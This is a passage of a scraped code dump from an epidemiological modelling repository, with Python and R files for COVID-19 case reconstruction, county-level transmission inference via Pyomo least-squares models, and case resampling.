all_df = pd.DataFrame(all_results)\n all_df.to_csv(output_csv, index=False, quoting=csv.QUOTE_NONNUMERIC)\n else:\n print(\"Writing results in file \"+output_json)\n filedir = os.path.dirname(output_json)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n with open(output_json, 'w') as OUTPUT:\n tmp = json.dumps(all_results, indent=4, cls=ToStr_JSONEncoder)\n OUTPUT.write(tmp)\n all_df = None\n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cfg:\n metadata['configuration'][key] = cfg[key]\n if output_csv:\n metaoutput = output_csv[:-4]+\"_meta.yml\" \n elif output_json.endswith('.json'):\n metaoutput = output_json[:-5]+\"_meta.yml\" \n elif output_json.endswith('.jsn'):\n metaoutput = output_json[:-4]+\"_meta.yml\" \n print(\"Writing results metadata in file \"+metaoutput)\n with open(metaoutput, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Print data\n #\n if verbose:\n if all_df is None:\n print(json.dumps(all_results, indent=4, cls=ToStr_JSONEncoder))\n else:\n pd.set_option('display.max_rows', 100000)\n print(all_df)\n\n timer.toc('Completed Inference')\n\n timer.tic('Completed All Inference Computations')\n\n\n\"\"\"\nThis is the previous version of 'run'. I'm caching this here so we can\nquickly go back to it.\n\nExample YAML file\ninference:\n - formulation: delay-ln-lsq\n deltaE: 5\n deltaI: 4\n deltaP: 7 # reporting delay (from time of infection to reported case)\n reportingfac: 1.0 # reporting factor (5 means actual cases = 5*reported)\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n - formulation: delay-lsq\n sigma: 0.1923076923 # 1/5.2\n gamma: 0.25 # 1/4\n deltaP: 7\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n\ndef run_old(args):\n with open(args.config_file, 'r') as fd:\n config = yaml.safe_load(fd)\n\n if 'inference' and 'batch_inference' not in config:\n raise ValueError('No inference or batch_inference key found in the YAML config')\n\n for cfg in config.get('inference', []):\n all_results = list()\n verbose = cfg.get('verbose', args.verbose)\n assert type(verbose) is bool\n \n if verbose:\n print('Inference Configuration:', cfg)\n \n formulation = cfg['formulation']\n ntrials = cfg.get('ntrials', None)\n\n input_csv = cfg['input_csv']\n assert(os.path.exists(input_csv))\n geodata_csv = input_csv[:-4] + \"_geodata.csv\"\n geodata_df = load_geodata(geodata_csv)\n\n population = cfg.get('population', None)\n county = cfg.get('county', None)\n assert(not ((population is None) and (county is None)))\n\n column = cfg.get('column', None)\n reporting_factor = cfg.get('reporting_factor', 1.0)\n assert type(reporting_factor) is float\n\n print(\"Input File: \"+input_csv+' with column '+str(column))\n if formulation == 'decay-lsq' or formulation == 'decay-blike':\n df, metadata = load_csv_data(input_csv)\n data = metadata['simulation parameters']\n ntrials = cfg.get('ntrials', df.columns)\n if verbose:\n print('parameters used to create data')\n print(data)\n\n if population is None:\n population = geodata_df['pop2010'][county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(county), str(population)))\n\n ndx = 0\n for t in df:\n if column is not None and t != 
column:\n continue\n \n ndx = ndx+1\n if not ntrials is None and ndx > ntrials:\n break\n\n # get the data - this will change with Bill's new stuff\n cm_rep_cases = df[t].to_list()\n\n sigma = cfg['sigma']\n gamma = cfg['gamma']\n deltaP = cfg['deltaP']\n\n if formulation == 'decay-lsq':\n results = frms.run_decay_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n deltaP=deltaP,\n reporting_factor=reporting_factor)\n else:\n # formulation == 'decay-blike'\n results = frms.run_decay_blike(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n deltaP=deltaP,\n reporting_factor=reporting_factor)\n\n results['est_R0'] = results['est_beta']/float(data['gamma'])\n results['true_beta'] = float(data['beta'])\n results['true_R0'] = float(data['beta'])/float(data['gamma'])\n all_results.append(results)\n\n elif formulation == 'delay-ln-lsq':\n raise NotImplementedError('Formulation ' + formulation + ' is not ready.')\n df, metadata = load_csv_data(input_csv)\n data = metadata['simulation parameters']\n if population is None:\n population = geodata_df['pop2010'][county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(county), str(population)))\n if verbose:\n print('parameters used to create data')\n print(data)\n for col in df:\n # get the data - this will change with Bill's new stuff\n cm_rep_cases = df[col].to_list()\n\n deltaE = cfg['deltaE']\n assert type(deltaE) is int and deltaE > 0\n deltaI = cfg['deltaI']\n assert type(deltaI) is int and deltaI > 0\n deltaP = cfg['deltaP']\n assert type(deltaP) is int and deltaP > 0\n\n results = frms.run_delay_ln_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n geodata_df=geodata_df)\n\n results['est_R0'] = results['est_beta']/float(data['gamma'])\n results['true_beta'] = float(data['beta'])\n results['true_R0'] = float(data['beta'])/float(data['gamma'])\n print(results)\n\n elif formulation == 'delay-lsq':\n #all_results = list()\n df, metadata = load_csv_data(input_csv)\n data = metadata['simulation parameters']\n if population is None:\n population = geodata_df['pop2010'][county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(county), str(population)))\n if verbose:\n print('parameters used to create data')\n print(data)\n for col in df:\n # get the data - this will change with Bill's new stuff\n cm_rep_cases = df[col].to_list()\n\n deltaE = cfg['deltaE']\n assert type(deltaE) is int and deltaE > 0\n deltaI = cfg['deltaI']\n assert type(deltaI) is int and deltaI > 0\n deltaP = cfg['deltaP']\n assert type(deltaP) is int and deltaP > 0\n\n results = frms.run_delay_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n geodata_df=geodata_df)\n\n results['est_R0'] = results['est_beta']/float(data['gamma'])\n results['true_beta'] = float(data['beta'])\n results['true_R0'] = float(data['beta'])/float(data['gamma'])\n\n else:\n raise ValueError('Invalid formulation', formulation, 'found in YAML file inference section.')\n\n all_df = pd.DataFrame(all_results)\n all_df.to_csv('inference_tests.csv', index=False, quoting=csv.QUOTE_NONNUMERIC)\n pd.set_option('display.max_rows', 100000)\n print(all_df)\n\n #\n # Process batch_inference blocks\n #\n for cfg in config.get('batch_inference', []):\n verbose = cfg.get('verbose', args.verbose)\n factors = cfg.get('factors', None)\n config = 
cfg.get('config', None)\n output = cfg.get('output', None)\n\n assert factors is not None\n assert config is not None\n assert output is not None\n assert type(verbose) is bool\n \n config = process_config(config)\n if verbose:\n print('Inference Configuration:\\n', config)\n all_results = list()\n\n for CONFIG in factorial_iterator(factors, config):\n geodata_df = load_geodata(CONFIG.geodata_csv)\n if CONFIG.population is None:\n CONFIG.population = geodata_df['pop2010'][CONFIG.county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(CONFIG.county), str(CONFIG.population)))\n\n check_config(CONFIG)\n print(\"Input File: \"+CONFIG.input_csv+' with column '+str(CONFIG.column))\n\n if CONFIG.formulation == 'decay-lsq' or CONFIG.formulation == 'decay-blike':\n all_results.extend( run_decay_lsq(CONFIG, verbose) )\n else:\n raise ValueError('Invalid formulation', CONFIG.formulation, 'found in YAML file inference section.')\n\n all_df = pd.DataFrame(all_results)\n #\n # Save results\n #\n print(\"Writing results in file \"+output)\n all_df.to_csv(output, index=False, quoting=csv.QUOTE_NONNUMERIC)\n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cfg:\n metadata['configuration'][key] = cfg[key]\n metaoutput = output[:-4]+\"_meta.yml\" \n print(\"Writing results metadata in file \"+metaoutput)\n with open(metaoutput, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Print data\n #\n pd.set_option('display.max_rows', 100000)\n print(all_df)\n\"\"\"\n\n\"\"\"\n df = pd.DataFrame(results)\n if args.resfile is not None:\n df.to_csv(args.resfile, index=False)\n\n print(df)\n print('Mean values:')\n print(df.mean())\n print(df.std())\n df.hist()\n #plt.title('foo')\n #plt.show()\n\"\"\"\n" }, { "alpha_fraction": 0.8275862336158752, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 37.66666793823242, "blob_id": "338affff7cf955cac26950d43705265e44392c06", "content_id": "0903e3f4fde722d010de39b868e7db1255a4c93c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 83, "num_lines": 3, "path": "/epi_inference/viz/choropleth/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.viz.choropleth\n\nfrom .choropleth import create_us_choropleth_scenario, create_us_choropleth_summary\n" }, { "alpha_fraction": 0.6485549211502075, "alphanum_fraction": 0.6485549211502075, "avg_line_length": 32.230770111083984, "blob_id": "4c409a07c0e6bb2002bb4906f1bc55f1cbc292a9", "content_id": "38e4a535f577ac4dcdbed01473af49f9619618a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "no_license", "max_line_length": 139, "num_lines": 26, "path": "/epi_inference/engine/meta_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = []\n\nfrom . import driver\nfrom .task import Task\nfrom .task_registry import register_task\n\n\nclass BlockMultiWorkflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"execute_blocks\",\n \"Define a sequence of YAML blocks that are sequentially executed. 
But parallelization options are applied to each in turn.\")\n\n def validate(self, CONFIG):\n valid_options = set(['blocks', 'num_processes', 'parallel_workflows', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n driver.run_block_multiworkflow(CONFIG, self._warnings, data)\n\n\nregister_task(BlockMultiWorkflow())\n\n" }, { "alpha_fraction": 0.6303746700286865, "alphanum_fraction": 0.6348280310630798, "avg_line_length": 37.9880256652832, "blob_id": "c10d832b746ebb2140dcfb128859969cdff62a6c", "content_id": "1878a35ac64b98189eafd0dd066150388f07e04a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6512, "license_type": "no_license", "max_line_length": 315, "num_lines": 167, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq']\n\nimport pyutilib.misc.timing as timing\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\n\nfrom .util import get_windows\n\n\ndef run_multinode_mobility_window_decay_lsq(*, recon, mobility, analysis_window, select_window=None, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n mobility : dict()\n A dictionary with inter-county mobility rates.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n select_window : str\n ISO date format that the window that will be used in this estimation. 
If None,\n then all windows are used.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # create the Pyomo optimization formulation\n m = create_inference_window_formulation(\n recon=recon,\n mobility=mobility,\n analysis_window=analysis_window,\n select_window=select_window,\n verbose=verbose\n )\n\n if m is None:\n return {'beta': None, 'status': 'failed', 'msg': 'Empty model.'}\n\n # call the solver\n timing.tic('Starting timer for solver')\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m)\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = {}\n for i in recon:\n county = {}\n county['FIPS'] = i\n county['window_days'] = m.window_days\n county['date'] = [recon[i]['dates'][w] for w in m.WINDOWS]\n if i in m.NODES:\n county['population'] = recon[i]['population']\n county['beta'] = []\n county['status'] = []\n county['infections_in_window'] = []\n for w in m.WINDOWS:\n if m.beta[i,w].stale == True:\n county['beta'].append( None )\n county['status'].append( 'stale' )\n else:\n county['beta'].append( value(m.beta[i,w]) )\n county['status'].append( 'ok' )\n county['infections_in_window'].append( m.window_transmissions[i][w] )\n results[i] = county\n\n return results\n\n\ndef create_inference_window_formulation(*, recon, mobility, analysis_window, select_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n mobility : dict()\n A dictionary with inter-county mobility rates.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. 
If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n \"\"\"\n window = int(analysis_window.get('days',14))\n assert(window >= 1)\n\n timing.tic('Starting timer for model construction - Pyomo')\n model = pe.ConcreteModel()\n\n eta = 0.5 # fraction of the day spent \"away\"\n\n nodes = set(k for k in recon)\n model.NODES = pe.Set(initialize=nodes)\n\n T_data = dict()\n I1_data = dict()\n I2_data = dict()\n I3_data = dict()\n S_data = dict()\n populations = dict()\n percent_mobile = dict()\n dates = None\n for nodeid in nodes:\n T_data[nodeid] = recon[nodeid]['transmissions']\n I1_data[nodeid] = recon[nodeid]['I1']\n I2_data[nodeid] = recon[nodeid]['I2']\n I3_data[nodeid] = recon[nodeid]['I3']\n S_data[nodeid] = recon[nodeid]['S']\n populations[nodeid] = recon[nodeid]['population']\n percent_mobile[nodeid] = sum(mobility[nodeid][j] for j in mobility[nodeid] if j in nodes)/populations[nodeid] if nodeid in mobility else 0\n\n if dates is None:\n dates = recon[nodeid]['dates']\n timing.toc('setup population and mobility information')\n\n # define the tuples for the windows\n windows = get_windows(dates, window_days=window, select_window=select_window)\n model.TIMES = pe.Set(initialize=windows.TIMES, ordered=True)\n WINDOWS = windows.WINDOWS\n WINDOW_TIMES = windows.WINDOW_TIMES_LIST\n\n # transmission parameter\n model.beta = pe.Var(model.NODES, WINDOWS, initialize=1.0, bounds=(0,None)) \n timing.toc('built variables')\n\n # define the expression for estimated transmissions\n def _infection_process(m, i, w, t):\n\n return m.beta[i,w] * ((I1_data[i][t] + I2_data[i][t] + I3_data[i][t]) /populations[i] * S_data[i][t] * (1-eta*percent_mobile[i])) + sum(m.beta[j,w] * ((I1_data[j][t] + I2_data[j][t] + I3_data[j][t]) * S_data[i][t] * mobility[i][j] * eta / (populations[j]*populations[i])) for j in mobility[i] if j in nodes)\n\n model.T_hat = pe.Expression(model.NODES, WINDOW_TIMES, rule=_infection_process)\n timing.toc('built infection process')\n\n # least squares objective function\n def _lse(m, i):\n return sum( (m.T_hat[i,w,t] - T_data[i][t])**2 for w,t in WINDOW_TIMES)/len(WINDOW_TIMES) #\\\n model.lse = pe.Expression(model.NODES, rule=_lse)\n\n model.total_lse = pe.Objective(expr=sum(model.lse[i] for i in nodes)/len(nodes))\n timing.toc('built objective')\n\n # get the approximate transmissions over the window period\n model.window_transmissions = dict()\n for i in nodes:\n d = dict()\n for w in WINDOWS:\n d[w] = sum(T_data[i][t] for ww,t in WINDOW_TIMES if ww == w)\n model.window_transmissions[i] = d\n \n model.WINDOWS = WINDOWS\n model.window_days = window\n return model\n\n" }, { "alpha_fraction": 0.572022557258606, "alphanum_fraction": 0.5880606174468994, "avg_line_length": 39.56626510620117, "blob_id": "53aa67fb62d889f05f23391c2dcde0426a247f7e", "content_id": "e236d92a21f1032ab46011c6028bcdda8d0156a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 3367, "license_type": "no_license", "max_line_length": 142, "num_lines": 83, "path": "/R_utilities/resample_county_cases.R", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "require(MASS)\nrequire(stringr)\n\nsample_county_negbin <- function(countyfile, window = 3, n_samples = 100, read_dir, write_dir){\n dat <- read.csv(paste0(read_dir, countyfile), stringsAsFactors = F)\n range <- c((window + 1) : nrow(dat)) # Instead using a symmetric window until 
the end, then using past data\n \n # If the county has no cases, keep them all at zero\n if (dat$Confirmed[nrow(dat)] == 0){\n samples_negbin <- as.data.frame(matrix(data=0, nrow=length(range), ncol=n_samples))\n } else {\n daily <- c(dat$Confirmed[1], dat$Confirmed[2:nrow(dat)] - dat$Confirmed[1:(nrow(dat) - 1)])\n params <- as.data.frame(matrix(data=NA, ncol=3))\n samples_negbin <- as.data.frame(matrix(data=NA, ncol=n_samples))\n r <- 1\n \n for (i in (window + 1):nrow(dat)){\n if (i > (nrow(dat) - window)){\n window_data <- daily[(length(daily) - (2*window + 1)) : length(daily)]\n } else {\n # Using a symmetric window (window size is number of days on either side of date of interest)\n window_data <- daily[(i - window):(i + window)]\n }\n if (all(window_data == 0)){\n # Need to force the negative binomial parameters to get a fit in some cases\n p2 <- 0\n p3 <- 1\n } else {\n if (min(window_data) < 2){\n low <- 0.1\n } else {\n low <- 1\n }\n fit <- TRUE\n fit <- tryCatch(fitdistr(window_data, 'Negative Binomial', lower = low), \n error = function(cond){\n return(fitted = FALSE)\n })\n if (length(fit) == 1){\n p2 <- mean(window_data)\n p3 <- sd(window_data)\n } else {\n p2 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[2])\n p3 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[1])\n }\n }\n params[r,] <- c(as.character(dat$Date[i]), p2, p3)\n samples_negbin[r,] <- rnegbin(n_samples, p2, p3)\n r <- r + 1\n }\n }\n for (j in 1:n_samples){\n new_df <- dat[range,]\n new_df$Confirmed <- cumsum(samples_negbin[,j])\n # Insert one day of zeroes before so that Bill's code works for all counties\n new_df <- rbind(dat[2,], new_df)\n new_df$Confirmed[1] <- 0\n new_df$FIPS <- as.character(new_df$FIPS)\n new_df$FIPS <- str_pad(new_df$FIPS, 5, pad='0')\n \n # Where to write these files\n # write_path <- paste0('../covid-data/formatted_data/county_data_resample/', folder_name, '/sample', str_pad(as.character(j), 3, pad='0'))\n write_path <- paste0(write_dir, '/sample', str_pad(as.character(j), 3, pad='0'))\n if (!dir.exists(file.path(write_path))){\n dir.create(file.path(write_path))\n }\n write.csv(new_df, file=paste0(write_path, '/', countyfile))\n }\n}\n\n# main_dir <- '../covid-data/formatted_data/county_data/'\n# # main_dir <- './formatted_data/county_data/'\n# folder_name <- list.files(main_dir)[length(list.files(main_dir))]\n# path <- paste0(main_dir, folder_name, '/')\n# county_files <- list.files(path)\n# \n# write_path <- paste0('../covid-data/formatted_data/county_data_resample/', folder_name)\n# # write_path <- paste0('./formatted_data/county_data_resample/', folder_name)\n# if (!dir.exists(file.path(write_path))){\n# dir.create(file.path(write_path))\n# }\n# \n# lapply(county_files, sample_county_negbin)\n" }, { "alpha_fraction": 0.748275876045227, "alphanum_fraction": 0.748275876045227, "avg_line_length": 28, "blob_id": "befaba470c8fbc2956034acaeb32c58ca422e3de", "content_id": "5bf08019b593355778772a7f1863da557751d880", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 60, "num_lines": 10, "path": "/epi_inference/engine/config_parameters.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['set_config_parameters', 'get_config_parameters']\n\nglobal_config_parameters = {}\n\ndef set_config_parameters(config_parameters):\n global global_config_parameters\n global_config_parameters = 
config_parameters\n\ndef get_config_parameters():\n return global_config_parameters\n" }, { "alpha_fraction": 0.7816091775894165, "alphanum_fraction": 0.7816091775894165, "avg_line_length": 20.75, "blob_id": "3b209fc0f3c00aeb86153db28fdfeb446bd4468d", "content_id": "e22103ce0e393fa8666ed2ae688ec8d02936375f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/epi_inference/viz/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.viz\n\nfrom . import reconstruction_figs\nfrom . import viz_choropleth_wf\n" }, { "alpha_fraction": 0.5595873594284058, "alphanum_fraction": 0.5610103011131287, "avg_line_length": 34.13750076293945, "blob_id": "854e01f912c8d788f4d94b2ff063e82a7e20a157", "content_id": "654e8ae0f6e31d7d91f2c828c0dbeef786e6b5e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2811, "license_type": "no_license", "max_line_length": 101, "num_lines": 80, "path": "/epi_inference/ATTIC/driver.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import argparse\nimport yaml\nfrom .task_registry import registered_tasks\n\n\ndef driver():\n Parser = argparse.ArgumentParser(description='inference models')\n Parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbosity flag')\n subparsers = Parser.add_subparsers(title='subcommands', help=\"Help\", dest=\"subparser_name\") \n #\n # Create subparsers\n #\n tasks = registered_tasks()\n parsers = []\n for name in sorted(tasks.keys()):\n parser = subparsers.add_parser(name, help=tasks[name].description)\n parser.add_argument('config_file', help='YAML configuration file')\n parsers.append(parser)\n #\n # Parse sys.argv\n #\n args = Parser.parse_args()\n if args.subparser_name is None:\n Parser.print_help()\n return\n #\n # Load the YAML configuration file\n #\n with open(args.config_file, 'r') as INPUT:\n try:\n config = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file\")\n print(exc)\n sys.exit(1)\n if args.verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(config)\n print(\"\")\n #\n # Iterate over all config blocks for the specified subcommand\n #\n if not (args.subparser_name in config):\n print(\"WARNING: No configuration blocks specified for '%s' subcommand\" % args.subparser_name)\n\n for cargs in config[args.subparser_name]:\n #\n # If the YAML data contains an 'output*' file, then \n # create a YAML file with metadata\n #\n ofname = None\n ofname = cargs.get('output',ofname)\n ofname = cargs.get('output_csv',ofname)\n ofname = cargs.get('output_json',ofname)\n if ofname is not None:\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cargs:\n metadata['configuration'][key] = cargs[key]\n #\n if ofname.endswith('.csv') or ofname.endswith('.jsn') or ofname.endswith('yml'):\n dfile = cargs['output'][:-4]+\"_meta.yml\"\n elif ofname.endswith('json') or ofname.endswith('yaml'):\n dfile = cargs['output'][:-5]+\"_meta.yml\"\n else:\n raise RuntimeError(\"Unknown output suffix: \"+ofname)\n #\n print(\"Writing file: \"+dfile)\n with open(dfile, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Launch the task that is named by\n #\n tasks[args.subparser_name].run(\n {},\n 
cargs\n )\n" }, { "alpha_fraction": 0.5415162444114685, "alphanum_fraction": 0.5415162444114685, "avg_line_length": 15.235294342041016, "blob_id": "6de45ffb98eed006b4f27b033649831be6875f54", "content_id": "4ef97ba524bae66a181b67102190f3b5cf2b838e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/epi_inference/engine/task.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['Task']\n\n\nclass Task(object):\n\n def __init__(self, name, description):\n self.name = name\n self.description = description\n\n def validate(self, args):\n pass\n\n def run(self, data, args):\n pass\n\n def warnings(self):\n pass\n\n" }, { "alpha_fraction": 0.5488061308860779, "alphanum_fraction": 0.553507387638092, "avg_line_length": 35.4054069519043, "blob_id": "9ab94a2ab8172b5231af947f8ef43d81a4a8d190", "content_id": "12e936be01a9d2dff1cefa7c0280bbc80d8f8b8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8083, "license_type": "no_license", "max_line_length": 151, "num_lines": 222, "path": "/epi_inference/ATTIC/reconstruct.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import csv\nimport json\nimport sys\n#import argparse\nimport yaml\nimport os.path\n#import shutil\nimport datetime\nimport pprint\nfrom .util import factorial_iterator, ToStr_JSONEncoder\nfrom .formulations import reconstruction as recon\nfrom pyutilib.misc import Options\nimport pandas as pd\n\n\ndef process_config(cfg):\n config = Options()\n\n #config.formulation = cfg['formulation']\n #config.ntrials = cfg.get('ntrials', None)\n config.input_csv = cfg['input_csv']\n config.population = cfg.get('population', None)\n config.county = cfg.get('county', None)\n #config.column = cfg.get('column', None)\n config.reporting_factor = cfg.get('reporting_factor', 1.0)\n config.deltaP = cfg.get('deltaP', 7)\n config.sigma = cfg.get('sigma', None)\n config.gamma = cfg.get('gamma', None)\n #config.factor_levels = cfg.get('factor_levels', None)\n #config.bootstrap = cfg.get('bootstrap', Options())\n #config.analysis_window = cfg.get('analysis_window', Options())\n\n # TODO - deprecate the use of the geodata CSV file option\n # TODO - deprecate the use of the geodata CSV file option\n if 'population_csv' not in cfg:\n config.population_csvfile = cfg.get('geodata_csv', config.input_csv[:-4] + \"_geodata.csv\")\n config.population_csvcolumn = 'pop2010'\n config.population_csvindex = 'geoid'\n else:\n config.population_csvfile = cfg['population_csv']['file']\n config.population_csvcolumn = cfg['population_csv']['population']\n config.population_csvindex = cfg['population_csv']['index']\n\n return config\n\ndef run_reconstruction(df, population_df, CONFIG, verbose):\n population_config = CONFIG.population\n population_csvcolumn = CONFIG.population_csvcolumn\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n deltaP = CONFIG.deltaP\n county = CONFIG.county\n reporting_factor = CONFIG.reporting_factor\n\n all_results = list()\n\n for t in df:\n if county is not None and t != county:\n continue\n\n if population_config is None:\n if t not in population_df[population_csvcolumn]: # pragma: no cover\n print(\"WARNING: county \"+str(t)+\" does not have population data available.\")\n continue\n population = population_df[population_csvcolumn][t]\n else:\n population = population_config\n 
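        # For each county column: pull its cumulative reported case curve and, if any
        # cases were reported, run the deterministic decay reconstruction. Note that
        # gamma is divided by 3 in the call below, consistent with the three
        # infectious stages (I1, I2, I3) returned by the reconstruction.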
cumulative_reported_cases = df[t].to_list()\n\n if df[t][-1] == 0:\n results = {}\n\n else:\n #\n # DO SIMULATION HERE\n #\n Cdates = pd.date_range(end=datetime.datetime(year=2020, month=4, day=12),\n periods=len(cumulative_reported_cases)).to_pydatetime().tolist()\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases,\n population=population,\n sigma=sigma,\n gamma=gamma/3,\n reporting_factor=reporting_factor,\n report_delay=deltaP\n )\n\n results = {}\n results['rdates'] = rdates\n results['rcases'] = rcases\n results['dates'] = dates\n results['T'] = T\n results['S'] = S\n results['E'] = E\n results['I1'] = I1\n results['I2'] = I2\n results['I3'] = I3\n results['R'] = R\n results['population'] = population\n\n results['FIPS'] = t\n #\n # Collect results in a list\n #\n all_results.append( results )\n return all_results\n\ndef check_config(config):\n if config.county is not None and type(config.county) is not str: # pragma: no cover\n print(\"ERROR: county id must be specified as a string\")\n sys.exit(1)\n try:\n assert(os.path.exists(config.input_csv))\n except: # pragma: no cover\n print(\"ERROR: input file \"+config.input_csv+\" does not exist\")\n raise\n assert type(config.reporting_factor) is float\n\n\ndef run(args):\n try:\n with open(args.config_file, 'r') as INPUT:\n config = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file\")\n print(exc)\n sys.exit(1)\n\n if 'reconstruct' not in config:\n raise ValueError('No \"reconstruct\" key found in the YAML config')\n\n for cfg in config.get('reconstruct', []):\n #\n # Process county case data, and execute reconstructions to predict the \n # temporal evolution of the compartments in the epi model.\n #\n verbose = cfg.get('verbose', args.verbose)\n factors = cfg.get('factors', None)\n output = cfg.get('output_json', None)\n\n assert output is not None\n assert type(verbose) is bool\n\n config = process_config(cfg)\n if verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(config)\n print(\"\")\n\n all_results = []\n\n if factors is None:\n config_list = [config]\n else:\n config_list = factorial_iterator(factors, config)\n\n for CONFIG in config_list:\n try:\n population_df = pd.read_csv(CONFIG.population_csvfile, encoding=\"ISO-8859-1\", dtype={CONFIG. 
population_csvindex:'str'})\n population_df = population_df.set_index(CONFIG.population_csvindex)\n except: # pragma: no cover\n print(\"ERROR reading file \"+CONFIG.population_csvfile)\n raise\n check_config(CONFIG)\n if CONFIG.population is None and CONFIG.county is not None:\n CONFIG.population = population_df[CONFIG.population_csvcolumn][CONFIG.county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(CONFIG.county), str(CONFIG.population)))\n\n #\n # Load the dataframe and experimental metadata (if it's available)\n #\n print(\"Input File: \"+CONFIG.input_csv)\n df = pd.read_csv(CONFIG.input_csv, index_col='Date')\n #\n # Execute inference\n #\n results = run_reconstruction(df, population_df, CONFIG, verbose)\n #\n # Augment reported results\n #\n for trial in results:\n if CONFIG.factor_levels is not None:\n for key, value in CONFIG.factor_levels.items():\n if not key in trial:\n trial[key] = value\n all_results.append( trial )\n\n #\n # Save results\n #\n print(\"Writing results in file \"+output)\n filedir = os.path.dirname(output)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n with 